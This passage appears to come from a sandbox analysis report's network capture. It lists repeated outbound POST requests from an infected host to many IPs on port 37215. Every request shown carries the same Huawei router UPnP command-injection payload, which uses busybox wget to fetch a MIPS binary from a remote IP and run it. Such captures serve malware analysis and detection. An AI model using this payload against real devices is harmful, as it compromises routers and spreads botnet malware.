2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            110192.168.2.1346788197.91.250.6137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.963759899 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            111192.168.2.1354370156.201.14.2937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.964617968 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            112192.168.2.134832841.15.193.24537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.965472937 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            113192.168.2.1341788197.234.232.22837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.966319084 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            114192.168.2.1336602197.230.194.337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.967169046 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            115192.168.2.1358160197.119.156.13337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.968007088 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            116192.168.2.1345692156.27.221.2237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.968821049 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            117192.168.2.1349034197.216.238.12937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.969655037 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            118192.168.2.136004641.174.115.3937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.970505953 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            119192.168.2.134725841.170.34.10137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.971340895 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            120192.168.2.1341548197.33.14.3337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.972188950 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
